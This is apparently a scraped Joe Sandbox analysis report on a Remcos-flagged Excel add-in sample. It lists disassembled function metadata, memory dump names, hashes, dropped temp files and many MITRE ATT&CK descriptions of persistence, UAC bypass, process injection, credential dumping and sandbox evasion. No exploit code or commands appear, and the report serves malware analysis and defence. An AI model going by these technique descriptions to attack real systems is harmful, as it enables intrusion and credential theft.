Function 00A4D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A4D220

Strings

%.3d, xrefs: 00A4D22B
X64, xrefs: 00A4D2A8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 8765b1a1c687c654327fb5624f91bf11ae1a42fbedd3e66cbb2300069386cb5f
Instruction ID: 5e47be479d4e2c6c66e5c8e78ffe3ef2b646d073b9b764ed586c0c98555748ee
Opcode Fuzzy Hash: 8765b1a1c687c654327fb5624f91bf11ae1a42fbedd3e66cbb2300069386cb5f
Instruction Fuzzy Hash: 54D012B5808109FACB9096D0DC498F9B3BCBB88301F608452F807A1080E6B4C5086B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A82322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 00A8232C
PostMessageW.USER32 ref: 00A8233F

Part of subcall function 00A5E97B: Sleep.KERNEL32 ref: 00A5E9F3

Strings

Shell_TrayWnd, xrefs: 00A82325

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: eac463faef3b037923b6a646c2c68bcbc43e4df40dd6e68e67357018e4ecb6d4
Instruction ID: aa7ae134879ab3fca4af2b8005652c32461a8f0f88daad32d87c0fee75fa9aee
Opcode Fuzzy Hash: eac463faef3b037923b6a646c2c68bcbc43e4df40dd6e68e67357018e4ecb6d4
Instruction Fuzzy Hash: 2FD0C936394310B6E668F7B09C1FFC6BA19AB00B21F1049267645AA1D1D9B8A8468B64

Uniqueness

Uniqueness Score: -1.00%

Function 00A82356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 00A8236C
PostMessageW.USER32 ref: 00A82373

Part of subcall function 00A5E97B: Sleep.KERNEL32 ref: 00A5E9F3

Strings

Shell_TrayWnd, xrefs: 00A82365

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 58d1928aaf1f0dac9257219c675e19a9e3a5ca081a012e8df25726e1c3d45bee
Instruction ID: 43ecbd25c48a686b7954687fd2530924546c37feda085e1b276b2b8235c0cca1
Opcode Fuzzy Hash: 58d1928aaf1f0dac9257219c675e19a9e3a5ca081a012e8df25726e1c3d45bee
Instruction Fuzzy Hash: 05D0C9323C1310BAE668F7B09C0FFC6B619AB05B21F1049267645AA1D1D9B8A8468B64

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 202404294766578200.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

C:\Users\user\AppData\Local\Temp\aut24D0.tmp

C:\Users\user\AppData\Local\Temp\aut252E.tmp

C:\Users\user\AppData\Local\Temp\aut904E.tmp

Windows Analysis Report
202404294766578200.xlam.xlsx

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre